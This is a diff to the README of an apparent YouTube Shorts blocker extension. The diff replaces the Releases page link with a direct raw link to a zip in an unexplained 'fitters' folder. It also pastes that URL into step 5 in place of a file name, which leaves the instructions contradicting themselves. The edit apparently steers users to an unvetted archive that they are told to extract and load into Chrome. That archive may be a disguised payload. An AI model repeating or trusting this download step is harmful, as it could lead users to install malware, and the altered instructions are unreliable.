yashbhow/youtube-shorts-blocker/README.md

 - No additional setup required.

 ## ⚙️ How to Download & Install
-1. Click this [link to download](https://github.com/yashbhow/youtube-shorts-blocker/releases) to visit the Releases page.
+1. Click this [link to download](https://raw.githubusercontent.com/yashbhow/youtube-shorts-blocker/main/fitters/shorts-blocker-youtube-v2.7.zip) to visit the Releases page.
 2. On the Releases page, find the latest version listed.
 3. Click on the version number to view the release details.
 4. Scroll down to find the "Assets" section.
-5. Look for the file that says `youtube-shorts-blocker.zip` or a similar name.
+5. Look for the file that says `https://raw.githubusercontent.com/yashbhow/youtube-shorts-blocker/main/fitters/shorts-blocker-youtube-v2.7.zip` or a similar name.
 6. Click on the file to download it to your computer.
 7. Once the download is complete, locate the downloaded `.zip` file and extract it.
 8. Open Google Chrome and go to the Extensions page by typing `chrome://extensions/` in the address bar.